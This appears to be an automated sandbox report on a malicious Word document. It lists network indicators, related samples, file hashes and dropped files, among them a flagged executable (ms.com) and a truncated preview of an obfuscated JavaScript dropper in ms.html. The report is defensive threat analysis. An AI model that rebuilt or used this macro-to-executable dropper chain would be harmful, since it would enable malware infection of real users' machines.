                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                      high
                                                                                      https://outlook.office365.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                        high
                                                                                                        http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwms.com, 00000001.00000003.224033467.0000000006E03000.00000004.00000040.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://entitlement.diagnostics.office.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                        high
                                                                                                                        https://ncus-000.contentsync.03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://login.windows.net/common/oauth2/authorize03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                high
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v203A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://loki.delve.office.com/api/v1/configuration/officewin32/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    104.28.6.227
                                                                                                                                                    unknownUnited States
                                                                                                                                                    13335CLOUDFLARENETUSfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                    Analysis ID:326338
                                                                                                                                                    Start date:03.12.2020
                                                                                                                                                    Start time:10:11:18
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 4m 51s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:documenti 12.01.20.doc
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:23
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • GSI enabled (VBA)
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal88.expl.winDOC@4/13@1/1
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    HDC Information:
                                                                                                                                                    • Successful, ratio: 100% (good quality ratio 83.9%)
                                                                                                                                                    • Quality average: 70.8%
                                                                                                                                                    • Quality standard deviation: 35%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 57%
                                                                                                                                                    • Number of executed functions: 7
                                                                                                                                                    • Number of non-executed functions: 3
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .doc
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Found warning dialog
                                                                                                                                                    • Click Ok
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.109.88.177, 52.109.12.21, 52.109.76.36, 51.104.139.180, 92.122.144.200, 104.43.193.48, 67.27.158.254, 8.248.113.254, 67.26.75.254, 67.27.158.126, 67.27.233.126, 20.54.26.129, 92.122.213.247, 92.122.213.194
                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    No context

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    CLOUDFLARENETUSdocumenti 12.01.20.docGet hashmaliciousBrowse
                                                                                                                                                    • 172.67.164.220
                                                                                                                                                    dettare-12.01.2020.docGet hashmaliciousBrowse
                                                                                                                                                    • 104.24.122.135
                                                                                                                                                    dettare-12.01.2020.docGet hashmaliciousBrowse
                                                                                                                                                    • 104.24.122.135
                                                                                                                                                    officialdoc!_013_2020.exeGet hashmaliciousBrowse
                                                                                                                                                    • 104.24.126.89
                                                                                                                                                    https://tvronline.com/ihsGet hashmaliciousBrowse
                                                                                                                                                    • 104.16.123.96
                                                                                                                                                    dettare-12.01.2020.docGet hashmaliciousBrowse
                                                                                                                                                    • 104.24.123.135
                                                                                                                                                    2020-12-03_08-45-45.exe.exeGet hashmaliciousBrowse
                                                                                                                                                    • 104.31.70.85
                                                                                                                                                    STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                                                                                                                    • 162.159.130.233
                                                                                                                                                    invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 172.67.143.180
                                                                                                                                                    Vlpuoe2JSz.exeGet hashmaliciousBrowse
                                                                                                                                                    • 23.227.38.74
                                                                                                                                                    MxL5EoQS5q.exeGet hashmaliciousBrowse
                                                                                                                                                    • 104.27.146.3
                                                                                                                                                    imVtKjcvlb.exeGet hashmaliciousBrowse
                                                                                                                                                    • 172.67.146.58
                                                                                                                                                    Quote.exeGet hashmaliciousBrowse
                                                                                                                                                    • 172.67.188.154
                                                                                                                                                    doc-3860.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 104.31.87.226
                                                                                                                                                    LIST_OF_IDs.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 104.22.1.232
                                                                                                                                                    niteEnrgy.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 162.159.134.233
                                                                                                                                                    Shipment Document BL,INV and packing list.jpg.exeGet hashmaliciousBrowse
                                                                                                                                                    • 23.227.38.74
                                                                                                                                                    info1270.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 104.28.11.60
                                                                                                                                                    urXFLGgIxo.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 104.22.0.232
                                                                                                                                                    urXFLGgIxo.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 172.67.8.238

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    C:\Users\Public\ms.comdettare-12.01.2020.docGet hashmaliciousBrowse
                                                                                                                                                      legal paper-12.01.2020.docGet hashmaliciousBrowse
                                                                                                                                                        statistics,11.20.2020.docGet hashmaliciousBrowse
                                                                                                                                                          commerce _11.20.2020.docGet hashmaliciousBrowse
                                                                                                                                                            file-11.20.docGet hashmaliciousBrowse
                                                                                                                                                              command-11.05.2020.docGet hashmaliciousBrowse
                                                                                                                                                                official paper_11.20.docGet hashmaliciousBrowse
                                                                                                                                                                  legal agreement 11.20.docGet hashmaliciousBrowse
                                                                                                                                                                    specifics 11.05.2020.docGet hashmaliciousBrowse
                                                                                                                                                                      particulars,11.20.docGet hashmaliciousBrowse
                                                                                                                                                                        enjoin-11.05.2020.docGet hashmaliciousBrowse
                                                                                                                                                                          specifics-11.05.2020.docGet hashmaliciousBrowse
                                                                                                                                                                            intelligence-11.05.2020.docGet hashmaliciousBrowse
                                                                                                                                                                              documents_11.20.docGet hashmaliciousBrowse
                                                                                                                                                                                file.11.20.docGet hashmaliciousBrowse
                                                                                                                                                                                  require-11.20.docGet hashmaliciousBrowse
                                                                                                                                                                                    require_11.20.docGet hashmaliciousBrowse
                                                                                                                                                                                      official paper.11.20.docGet hashmaliciousBrowse
                                                                                                                                                                                        order_11.20.docGet hashmaliciousBrowse
                                                                                                                                                                                          material-11.20.docGet hashmaliciousBrowse

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\Users\Public\ms.com
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):13312
                                                                                                                                                                                            Entropy (8bit):4.926696656173964
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:ohs5YZgW7BXxaQbmpi/Dago+Mz8FDe2WwqrIRbW3oo:9kBXxfmpimR78E2WwqIWYo
                                                                                                                                                                                            MD5:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                                                                            SHA1:274216860964AF5ACDCE5F7BD508F69C98FA55B2
                                                                                                                                                                                            SHA-256:CBAB3546BDDB2E4EA340C1A7DF680DA6C4F4F2F18B8E98F6D4B66926183E269E
                                                                                                                                                                                            SHA-512:8047FCAB5D3A35A405661C72879D6EBCF3EF2AFE7486649F0BBC43FA59E898A9E37A998940764422E1AB0AE066B3E45132D67CAB963B9BF3C44BC3EC8D4EDC6D
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: dettare-12.01.2020.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: legal paper-12.01.2020.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: statistics,11.20.2020.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: commerce _11.20.2020.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: file-11.20.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: command-11.05.2020.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: official paper_11.20.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: legal agreement 11.20.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: specifics 11.05.2020.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: particulars,11.20.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: enjoin-11.05.2020.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: specifics-11.05.2020.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: intelligence-11.05.2020.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: documents_11.20.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: file.11.20.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: require-11.20.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: require_11.20.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: official paper.11.20.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: order_11.20.doc, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: material-11.20.doc, Detection: malicious, Browse
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q*A..D...D...D..h....D..tG...D..t@...D...E...D..tE...D..tA...D..tM...D..t....D..tF...D.Rich..D.........PE..L...R........................"...............0....@..................................j....@..................................@..d....P.......................p..........T............................................@...............................text............................... ..`.data........0......................@....idata..F....@......................@..@.rsrc........P......................@..@.reloc.......p.......2..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\Public\ms.html
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):17904
                                                                                                                                                                                            Entropy (8bit):5.221943493256307
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:eBZQiLCb1hint4zdt1e870k0hs70k0C2qNXl6qJExTxvYj0lXUZIeYsa3UKh73uy:e3QYnadWs4TxYI2ZHeM7MQc
                                                                                                                                                                                            MD5:7F908F1EE0BBB0B276589F06368A008D
                                                                                                                                                                                            SHA1:EE9D0FA4C45AEB9C75750AA003E7C0F0F22E348D
                                                                                                                                                                                            SHA-256:8B23A9189FD2FE4CC89459224ED36E7A64121DE9589D3AC9CEAE9E4DEEF7F23A
                                                                                                                                                                                            SHA-512:3FBEBBCD1B5F2A731470037A702BA58EEFBC0764874D465539E90B6FCD4BA16E93221E8EB402BF2D3B603A6B4D81E3B1A2E68EA3625A93716F4EF991FA625633
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview: <html>..<body>..<script language="javascript">..var a3MQw4 = true;..var a3yaLo = -47909;..function decode(input)..{..var keystr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";..var output = "";..var chr1, chr2, chr3;..var enc1, enc2, enc3, enc4;..var i = 0;..input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");..while (i < input.length)..{..enc1 = keystr.indexOf(input.charAt(i++));..enc2 = keystr.indexOf(input.charAt(i++));..enc3 = keystr.indexOf(input.charAt(i++));..enc4 = keystr.indexOf(input.charAt(i++));..chr1 = (enc1 << 2) | (enc2 >> 4);..chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);..chr3 = ((enc3 & 3) << 6) | enc4;..output = output + String.fromCharCode(chr1);..if(enc3 != 64)..{..output = output + String.fromCharCode(chr2);..}..if(enc4 != 64)..{..output = output + String.fromCharCode(chr3);..}..}..return(output);..}..var aVEqp = true;..var atpoA = "HKEY_CURRENT_USER\\Software\\aHgVT\\auJ5v2";..var a7PjY = "a9IlS";..var a4qgwu = a7PjY.length;..anD3Wb = true;..window
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\03A112E3-5A1A-4EB6-A30A-4E5816B016CD
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):130058
                                                                                                                                                                                            Entropy (8bit):5.378006827606677
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:6cQceNWrA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:hmQ9DQW+zBX8u
                                                                                                                                                                                            MD5:F28073F5D9517A703D6F836C06E3BD72
                                                                                                                                                                                            SHA1:F3D940A80A311EFCD0E05027AEC396B477CD3390
                                                                                                                                                                                            SHA-256:2BF2B6CB402BBEB2DF6D7C17F4F26FADFF892B82B46848B2A1D07815FFAFC3CF
                                                                                                                                                                                            SHA-512:093D18E703EB29CC96B81E62CF1C242FB9DDEEFE2011A1853F08A1B25B2BB9C2E9E857BE754DE016C0507A14C904AAC9B8C0952F43C160BD45643BA1769FC5A3
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-12-03T09:12:11">.. Build: 16.0.13601.30534-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D1F0E0D.jpeg
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:[TIFF image data, big-endian, direntries=4, xresolution=62, yresolution=70, resolutionunit=2, software=Paint.NET v3.5.11], baseline, precision 8, 994x241, frames 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):57258
                                                                                                                                                                                            Entropy (8bit):7.900983242117529
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:Nne7FOQKYij8iCi2EQrb4lF6j5UTFRHehGLOAFed/6CO2wPbttab/jz7Q+6fNsaw:Ne7Il+Oy4wUOAL2wPbnQ/Tz6CaCd
                                                                                                                                                                                            MD5:B44AC26E80A557B913B715F234C3D769
                                                                                                                                                                                            SHA1:1E0574649A9E5BBE0283D83A801E0E3EC4261BBC
                                                                                                                                                                                            SHA-256:1EFAC6DE241D24814D7925C803E3ACBF4E2CD4A90FDE9C6826613DE2A8063B7B
                                                                                                                                                                                            SHA-512:4349E729AEDC4E69A92432553C0BEA8CF5D4D92E7908F25DB5DF3E1B3628F74D362AFD15AED5EED12E53ABDFFAB44F81E39006C8C6FF4D242A05D45AFFA08E5D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview: ......JFIF.....`.`.....hExif..MM.*.................>...........F.(...........1.........N.......`.......`....Paint.NET v3.5.11....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......C@.9.cJ9.b.....^..e...G..~.vP/...]f...Zh.....1y.7.%R5'v.WE..@..J.N....V....9.e...$a....R..R..{...........).......O.|<.-bR.>..^.F[$a........... ....r.../.....?.._.....'.7A+.r...3..Yj..o.'o....=)k......?..8.._....K................g....8...e\...e.(...q..1.2.W.3...
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{530E58BB-187E-4C19-8B2C-85E6BFE40879}.tmp
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:X:X
                                                                                                                                                                                            MD5:32649384730B2D61C9E79D46DE589115
                                                                                                                                                                                            SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
                                                                                                                                                                                            SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
                                                                                                                                                                                            SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                                            Preview: ..
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{68948AFA-45F9-4DB8-A153-5A7DB6FAA966}.tmp
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1536
                                                                                                                                                                                            Entropy (8bit):0.3796147056131488
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:9l3lli4wltfSP8lFllItEMAWuWy:kFSP8gtEMAWpy
                                                                                                                                                                                            MD5:39F0255F9BB41BD49E765898D326FB77
                                                                                                                                                                                            SHA1:8AD67EEB7CF2ED4CA7DD1AF586406DE92113C6F1
                                                                                                                                                                                            SHA-256:7DB4A7FAFE19900A941F5EC134454C4769D6D1F8227A176A3CEBD9F3C7D86056
